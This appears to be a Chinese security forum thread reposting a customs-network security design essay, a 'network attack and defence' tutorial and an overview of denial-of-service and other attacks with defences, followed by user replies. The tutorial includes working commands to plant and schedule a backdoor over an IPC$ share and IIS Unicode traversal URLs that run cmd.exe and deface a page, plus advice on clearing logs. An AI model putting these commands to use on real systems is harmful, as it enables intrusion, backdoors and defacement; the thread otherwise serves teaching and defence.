  无论是交换式集线器还是VLAN交换机,都是以交换技术为核心,它们在控制广播、防止黑客上相当有效,但同时也给一些基于广播原理的入侵监控技术和协议分析技术带来了麻烦。因此,如果局域网内存在这样的入侵监控设备或协议分析设备,就必须选用特殊的带有SPAN(Switch Port Analyzer)功能的交换机。这种交换机允许系统管理员将全部或某些交换端口的数据包映射到指定的端口上,提供给接在这一端口上的入侵监控设备或协议分析设备。笔者在厦门海关外部网设计中,就选用了Cisco公司的具备SPAN功能的Catalyst系列交换机,既得到了交换技术的好处,又使原有的Sniffer协议分析仪“英雄有用武之地”。

广域网安全

  由于广域网大多采用公网来进行数据传输,信息在广域网上传输时被截取和利用的可能性就比局域网要大得多。如果没有专用的软件对数据进行控制,只要使用Internet上免费下载的“包检测”工具软件,就可以很容易地对通信数据进行截取和破译。

  因此,必须采取手段,使得在广域网上发送和接收信息时能够保证:

  ①除了发送方和接收方外,其他人是无法知悉的(隐私性);

  ②传输过程中不被篡改(真实性);

  ③发送方能确知接收方不是假冒的(非伪装性);

  ④发送方不能否认自己的发送行为(不可抵赖性)。

  为了达到以上安全目的,广域网通常采用以下安全解决办法:

  1.加密技术

  加密型网络安全技术的基本思想是不依赖于网络中数据通道的安全性来实现网络系统的安全,而是通过对网络数据的加密来保障网络的安全可靠性。数据加密技术可以分为三类,即对称型加密、不对称型加密和不可逆加密。

  其中不可逆加密算法不存在密钥保管和分发问题,适用于分布式网络系统,但是其加密计算量相当可观,所以通常用于数据量有限的情形下使用。计算机系统中的口令就是利用不可逆加密算法加密的。近年来,随着计算机系统性能的不断提高,不可逆加密算法的应用逐渐增加,常用的如RSA公司的MD5和美国国家标准局的SHS。在海关系统中广泛使用的Cisco路由器,有两种口令加密方式:Enable Secret和Enable Password。其中,Enable Secret就采用了MD5不可逆加密算法,因而目前尚未发现破解方法(除非使用字典攻击法)。而Enable Password则采用了非常脆弱的加密算法(即简单地将口令与一个常数进行XOR与或运算),目前至少已有两种破解软件。因此,最好不用Enable Password。

  2.VPN技术

  VPN(虚拟专网)技术的核心是采用隧道技术,将企业专网的数据加密封装后,透过虚拟的公网隧道进行传输,从而防止敏感数据的被窃。VPN可以在Internet、服务提供商的IP、帧中继或ATM网上建立。企业通过公网建立VPN,就如同通过自己的专用网建立内部网一样,享有较高的安全性、优先性、可靠性和可管理性,而其建立周期、投入资金和维护费用却大大降低,同时还为移动计算提供了可能。因此,VPN技术一经推出,便红遍全球。

  但应该指出的是,目前VPN技术的许多核心协议,如L2TP、IPSec等,都还未形成通用标准。这就使得不同的VPN服务提供商之间、VPN设备之间的互操作性成为问题。因此,企业在VPN建网选型时,一定要慎重选择VPN服务提供商和VPN设备。

  3.身份认证技术

  对于从外部拨号访问总部内部网的用户,由于使用公共电话网进行数据传输所带来的风险,必须更加严格控制其安全性。一种常见的做法是采用身份认证技术,对拨号用户的身份进行验证并记录完备的登录日志。较常用的身份认证技术,有Cisco公司提出的TACACS+以及业界标准的RADIUS。笔者在厦门海关外部网设计中,就选用了Cisco公司的CiscoSecure ACS V2.3软件进行RADIUS身份认证。

外部网安全

  海关的外部网建设,通常指与Internet的互联及与外部企业用户的互联两种。无论哪一种外部网,都普遍采用基于TCP/IP的Internet协议族。Internet协议族自身的开放性极大地方便了各种计算机的组网和互联,并直接推动了网络技术的迅猛发展。但是,由于在早期网络协议设计上对安全问题的忽视,以及Internet在使用和管理上的无政府状态,逐渐使Internet自身的安全受到威胁,黑客事件频频发生。

  对外部网安全的威胁主要表现在:非授权访问、冒充合法用户、破坏数据完整性、干扰系统正常运行、利用网络传播病毒、线路窃听等。

  外部网安全解决办法主要依靠防火墙技术、入侵检测技术和网络防病毒技术。在实际的外部网安全设计中,往往采取上述三种技术(即防火墙、入侵检测、网络防病毒)相结合的方法。笔者在厦门海关外部网设计中,就选用了NAI公司最新版本的三宿主自适应动态防火墙Gauntlet Active Firewall。该防火墙产品集成了Gauntlet Firewall、CyberCop Scanner、CyberCop Monitor、WebShield for Firewall等套件,将防火墙技术、入侵检测技术与网络防病毒技术融为一体,紧密结合,相得益彰,性价比比较高。



B39层 发表时间: 11/10 20:48

回复: mingming8 [mingming8]   论坛用户   登录
网络攻防教程
--------------------------------------------------------------------------------
作者:未知 来源:未知 日期:2003-02-07 点击:403

--------------------------------------------------------------------------------

网 络 攻 防
声明:

本教程一切涉及攻击方面的方法及实例目的为了了解漏洞隐患,以便我们针对不同的漏洞做好安全防范。大家不要利用这些攻击方法去肆意破坏他人的系统及网络。

概述

信息和网络安全技术经过近十年的发展,在深度和广度上已经有了很大的进步,其中一个重要的研究趋势就是注重攻、防结合,追求动态安全。

教程内容

了解系统及网络的不安全隐患
了解系统漏洞的原理及危险性
攻击技巧及工具的使用
如何利用漏洞进行系统攻击
如何利用漏洞进行网络攻击
对软件漏洞的攻击及软件的破解
如何防止恶意攻击
如何构建安全的系统和网络环境
引子

深入了解系统漏洞及管理漏洞带来的危险性。

例1 (弱口令漏洞攻击) 目的:了解管理漏洞带来的危害。 net use \\xxx.xxx.xxx.xxx\ipc$ password /user:admin copy backdoor.exe \\xxx.xxx.xxx.xxx\admin$\system32 net time \\xxx.xxx.xxx.xxx at \\xxx.xxx.xxx.xxx 23:00 backdoor.exe
例2 (Unicode漏洞攻击) 目的:了解系统漏洞带来的危害。 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+iamhacker+>;c:\inetpub\wwwroot\index. htm
黑客定义的争议

什么是黑客?

黑客其实是Hacker的音译,源于动词Hack其引申意义是指“干了一件非常漂亮的事”。在这里我们说黑客是指那些精于某方面技术的人。对于计算机而言,黑客就是精通网络、系统、外设以及软硬件技术的人。

什么是骇客? 有些黑客逾越尺度,运用自己的知识去做出有损他人权益的事情,我们就称这种人为骇客(Cracker,破坏者)。

黑客精神

“Free”(自由、免费)的精神
探索与创新的精神 所有的黑客都是喜欢探索软件程序奥秘的人。他们探索程序与系统的漏洞,在发现问题的同时会提出解决问题的方法。
反传统的精神
合作的精神
黑客守则(守则有很多版本,整理为12条)

不要恶意破坏任何的系统,这样做只会给你带来麻烦。
不要破坏别人的软件和资料。
不要修改任何系统文件,如果是因为进入系统的需要而修改了系统文件,请在目的达到后将他改回原状。
不要轻易的将你要黑的或者黑过的站点告诉你不信任的朋友。
在发表黑客文章时不要用你的真实名字。
正在入侵的时候,不要随意离开你的电脑。
不要入侵或破坏政府机关的主机。
将你的笔记放在安全的地方。
已侵入的电脑中的账号不得清除或修改。
可以为隐藏自己的侵入而作一些修改,但要尽量保持原系统的安全性,不能因为得到系统的控制权而将门户大开。
不要做一些无聊、单调并且愚蠢的重复性工作。
做真正的黑客,读遍所有管一系统安全或系统漏洞的书。
为什么会有攻击?

帮助系统管理员检察系统漏洞
位子你的私人恩怨而攻击
商业或个人目的获得秘密资料
民族仇恨
利用对方的系统资源满足自己的需求
寻求刺激
无目的攻击
攻击前的准备工作

隐藏自己的IP

攻击的途径

针对端口攻击
针对服务攻击
针对第三方软件攻击
DOS攻击
针对系统攻击
口令攻击
欺骗
攻击的过程(进攻四部曲)

踩点扫描 被动的侦察(监听) 主动的侦察
获得系统或管理员权限
保持访问
在网络中隐身 清除脚印
踩点

什么是踩点?

踩点就是通过各种途径对所要攻击的目标进行多方面的了解 (包括任何可得到的蛛丝马迹,但要确保信息的准确)。

踩点的方法

域名及其注册机构的查询
公司性质的了解
对主页进行分析
邮件地址的搜集
目标IP地址范围查询
主动的侦察(扫描)

扫描的目的

扫描的目的就是利用各种工具在攻击目标的IP地址或地址段的主机上寻找漏洞。

扫描的原理

扫描是采取模拟攻击的形式对目标可能存在的已知安全漏洞逐项进行检查,目标可以是工作站、服务器、交换机、路由器、数据库应用等对象。根据扫描结果向扫描者或管理员提供周密可靠的分析报告。

被动的侦察(嗅探监听)

背景

网络嗅探监听原本是网络管理员使用一类管理工具,监视网络的状态、数据的流动、以及网络上传输的信息。但这类工具也常被黑客所使用,以此获得网络上传输的敏感信息。监听效果最好的地方是网关、路由器、防火墙之类信息聚集的设备处。

嗅探监听的原理

以太网协议的工作方式:

为将要发送的数据包发往所有的连在一起的主机,也就是广播,在报头中包含目标机的正确地址。因此只有与数据包中目标地址一致的那台主机才会接收数据包,其他的机器都会将包丢弃。但是,当主机工作在监听模式下时,无论接收到的数据包中目标地址是什么,主机都将其接收下来。 一个合法的网络接口应响应的数据帧:

帧的目标区域具有和本地网络接口相匹配的硬件地址; 帧的目标区域具有“广播地址”; 网络接口在接收到上面这两种数据包时,NC(Numerical Control, 数字计算机控制)通过CPU产生一个硬件中断,该中断使操作系统将帧中所包含的数据传送给系统进一步处理。监听软件就是能使本地NC处于混杂状态,这时NC具备“广播地址”所以对所有接收的帧都产生一个硬件中断。 注释: 一台计算机只能监听经过自己网络接口的数据包,不能监听不在同一网段的计算机传输的信息。

网络嗅探监听的检测

检测的难度

运行网络监听的主机只是被动的接收数据,并没有主动的行动,既不会与其他主机交换信息,也不能修改网上传输的信息包。这决定了网络监听检测是非常困难的。

解决办法

运行监听软件的主机系统因为负荷过重,因此对外界的响应缓慢。 对怀疑运行监听程序的主机,用正确的ip地址和错误的物理地址去ping,如果运行了监听程序该机会有响应。因为正常的机器不接受错误的物理地址,处于监听状态的主机会接受。

如何获得系统或管理员权限

获得系统及管理员权限的目的

连接到远程计算机,对他进行控制,达到自己的攻击目的。

获得系统及管理员权限的方法

通过系统漏洞获得系统权限。
通过管理漏洞获得管理员权限。
通过软件漏洞得到系统权限。
通过监听获得敏感信息进一步获得相应权限。
通过弱口令获得远程管理员的用户密码。
通过穷举法获得远程管理员的用户密码。
通过攻破与目标机有信任关系另一台机器进而得到目标机的控制权。
通过欺骗获得权限。
其他有效的方法。
长期保持对攻击目标的控制

后门

入侵者的最后一招便是在受侵害的系统上创造一些机会以便日后卷土重来,并希望能伪装成管理员----种植后门或木马。

后门的种类很多

网页后门
Telnet后门
账号后门
木马
系统后门
击键记录后门
攻击之后的工作(掩盖踪迹)

清除事件查看器日志
清除IIS、中端服务日志
隐藏文件


B40层 发表时间: 11/10 20:49

回复: mingming8 [mingming8]   论坛用户   登录
网络攻击概述
发布: 艰苦 日期: 10-30 类别: 新手上路 今日/总浏览: 60/4338 

/*************************************
原作者:Matthew strebe
来 源:天天安全网
**************************************
1、服务拒绝攻击
服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括:

死亡之ping (ping of death)
概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。

防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包括:从windows98之后的windows,NT(service
pack 3之后),linux、Solaris、和Mac OS都具有抵抗一般ping ofdeath攻击的能力。此外,对防火墙进行配置,阻断ICMP以及任何未知协议,都讲防止此类攻击。

泪滴(teardrop)
概览:泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括servicepack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。
防御:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。

UDP洪水(UDP flood)
概览:各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果足够多的数据流就会导致带宽的服务攻击。

防御:关掉不必要的TCP/IP服务,或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。

SYN洪水(SYN flood)
概览:一些TCP/IP栈的实现只能等待从有限数量的计算机发来的ACK消息,因为他们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接停止响应,直到缓冲区里的连接企图超时。在一些创建连接不受限制的实现里,SYN洪水具有类似的影响。

防御:在防火墙上过滤来自同一主机的后续连接。
未来的SYN洪水令人担忧,由于释放洪水的并不寻求响应,所以无法从一个简单高容量的传输中鉴别出来。

Land攻击
概览:在Land攻击中,一个特别打造的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,对Land攻击反应不同,许多UNIX实现将崩溃,NT变的极其缓慢(大约持续五分钟)。

防御:打最新的补丁,或者在防火墙进行配置,将那些在外部接口上入站的含有内部源地址滤掉。(包括10域、127域、192.168域、172.16到172.31域)

Smurf攻击
概览:一个简单的smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求
(ping)数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比pingof death洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。
防御:为了防止黑客利用你的网络攻击他人,关闭外部路由器或防火墙的广播地址特性。为防止被攻击,在防火墙上设置规则,丢弃掉ICMP包。

Fraggle攻击
概览:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP
防御:在防火墙上过滤掉UDP应答消息

电子邮件炸弹
概览:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器不断的大量的向同一地址发送电子邮件,攻击者能够耗尽接受者网络的带宽。
防御:对邮件地址进行配置,自动删除来自同一主机的过量或重复的消息。

畸形消息攻击
概览:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息可能会崩溃。
防御:打最新的服务补丁。

2、利用型攻击

利用型攻击是一类试图直接对你的机器进行控制的攻击,最常见的有三种:

口令猜测
概览:一旦黑客识别了一台主机而且发现了基于NetBIOS、Telnet或NFS这样的服务的可利用的用户帐号,成功的口令猜测能提供对机器控制。
防御:要选用难以猜测的口令,比如词和标点符号的组合。确保像NFS、NetBIOS和Telnet这样可利用的服务不暴露在公共范围。如果该服务支持锁定策略,就进行锁定。

特洛伊木马
概览:特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。
最有效的一种叫做后门程序,恶意程序包括:NetBus、BackOrifice和BO2k,用于控制系统的良性程序如:netcat、VNC、pcAnywhere。理想的后门程序透明运行。

防御:避免下载可疑程序并拒绝执行,运用网络扫描软件定期监视内部主机上的监听TCP服务。

缓冲区溢出
概览:由于在很多的服务程序中大意的程序员使用象strcpy(),strcat()类似的不进行有效位检查的函数,最终可能导致恶意用户编写一小段利用程序来进一步打开安全豁口然后将该代码缀在缓冲区有效载荷末尾,这样当发生缓冲区溢出时,返回指针指向恶意代码,这样系统的控制权就会被夺取。

防御:利用SafeLib、tripwire这样的程序保护系统,或者浏览最新的安全公告不断更新操作系统。

3、信息收集型攻击

信息收集型攻击并不对目标本身造成危害,如名所示这类攻击被用来为进一步入侵提供有用的信息。主要包括:扫描技术、体系结构刺探、利用信息服务

扫描技术

地址扫描
概览:运用ping这样的程序探测目标地址,对此作出响应的表示其存在。
防御:在防火墙上过滤掉ICMP应答消息。

端口扫描
概览:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功的建立了连接的主机所开的端口。
防御:许多防火墙能检测到是否被扫描,并自动阻断扫描企图。


反响映射
概览:黑客向主机发送虚假消息,然后根据返回“hostunreachable”这一消息特征判断出哪些主机是存在的。目前由于正常的扫描活动容易被防火墙侦测到,黑客转而使用不会触发防火墙规则的常见消息类型,这些类型包括:RESET消息、SYN-ACK消息、DNS响应包。

防御:NAT和非路由代理服务器能够自动抵御此类攻击,也可以在防火墙上过滤“hostunreachable”ICMP应答。

慢速扫描
概览:由于一般扫描侦测器的实现是通过监视某个时间桢里一台特定主机发起的连接的数目(例如每秒10次)来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。

防御:通过引诱服务来对慢速扫描进行侦测。

体系结构探测
概览:黑客使用具有已知响应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的响应进行检查。由于每种操作系统都有其独特的响应方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的响应与数据库中的已知响应进行对比,黑客经常能够确定出目标主机所运行的操作系统。

防御:去掉或修改各种Banner,包括操作系统和各种应用服务的,阻断用于识别的端口扰乱对方的攻击计划。

利用信息服务

DNS域转换
概览:DNS协议不对转换或信息性的更新进行身份认证,这使得该协议被人以一些不同的方式加以利用。如果你维护着一台公共的DNS服务器,黑客只需实施一次域转换操作就能得到你所有主机的名称以及内部IP地址。

防御:在防火墙处过滤掉域转换请求。

Finger服务
概览:黑客使用finger命令来刺探一台finger服务器以获取关于该系统的用户的信息。
防御:关闭finger服务并记录尝试连接该服务的对方IP地址,或者在防火墙上进行过滤。

LDAP服务
概览:黑客使用LDAP协议窥探网络内部的系统和它们的用户的信息。
防御:对于刺探内部网络的LDAP进行阻断并记录,如果在公共机器上提供LDAP服务,那么应把LDAP服务器放入DMZ。

4、假消息攻击

用于攻击目标配置不正确的消息,主要包括:DNS高速缓存污染、伪造电子邮件。

DNS高速缓存污染
概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以将不正确的信息掺进来并把用户引向黑客自己的主机。
防御:在防火墙上过滤入站的DNS更新,外部DNS服务器不应能更改你的内部服务器对内部机器的认识。

伪造电子邮件
概览:由于SMTP并不对邮件的发送者的身份进行鉴定,因此黑客可以对你的内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附带上可安装的特洛伊木马程序,或者是一个引向恶意网站的连接。

防御:使用PGP等安全工具并安装电子邮件证书。



B41层 发表时间: 11/10 20:50

回复: cncd [cncd]   论坛用户   登录
谢谢孤独,辛苦了。
你的珍藏大放送啊。
很好的东西。
我觉得发在乐园好象更合适。
粗略看了下,其中有介绍黑客文化的经典文章,有基础知识和工具使用的教程,还有高手学习的经验之谈……。内容丰富,涵盖也广。很适合初学者阅读。读了这些,至少会对网络安全和黑客文化有个较全面的初步认识。
你搜集这些也下工夫了。
恰好前些天得到一个FTP地址,有不少资料,你可以去看看。
速度较慢,下大软件不方便,但下文档资料还行,也很丰富。
ftp://77169:77169.com@77169.vicp.net/


[此贴被 菜鸟初段(cncd) 在 11月10日21时51分 编辑过]

B42层 发表时间: 11/10 21:40

回复: abctm [abctm]   版主   登录
顶,不过地方不对

B43层 发表时间: 11/10 21:46

回复: xingguo [xingguo]   论坛用户   登录
我也顶,有些文章却实写到点子上去了。

B44层 发表时间: 11/11 13:33

回复: mingming8 [mingming8]   论坛用户   登录
我感觉也是!
有没有人能帮转到菜鸟乐园去!

B45层 发表时间: 11/11 18:13

回复: mingming8 [mingming8]   论坛用户   登录
没人帮忙吗?

B46层 发表时间: 11/12 20:52

回复: zyj_ayi [zyj_ayi]   论坛用户   登录

也是,地方好象不对.

B47层 发表时间: 11/13 17:11

回复: ywyjz [ywiccyjz]   论坛用户   登录
顶一下,不过一次性发太多了,我想没人几个人会全部看完的

B48层 发表时间: 11/13 19:18

回复: mingming8 [mingming8]   论坛用户   登录
看点是点嘛~~~

B49层 发表时间: 11/13 19:49

回复: mingming8 [mingming8]   论坛用户   登录
就没有哪位朋友能帮我顶一顶吗?

B50层 发表时间: 11/14 21:36

回复: mingming8 [mingming8]   论坛用户   登录
yun

B51层 发表时间: 11/26 19:42

回复: zintaly [zintaly]   论坛用户   登录
顶一下!我现在就复制到我的机上,以后慢慢来看!多谢

B52层 发表时间: 11/26 22:47

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号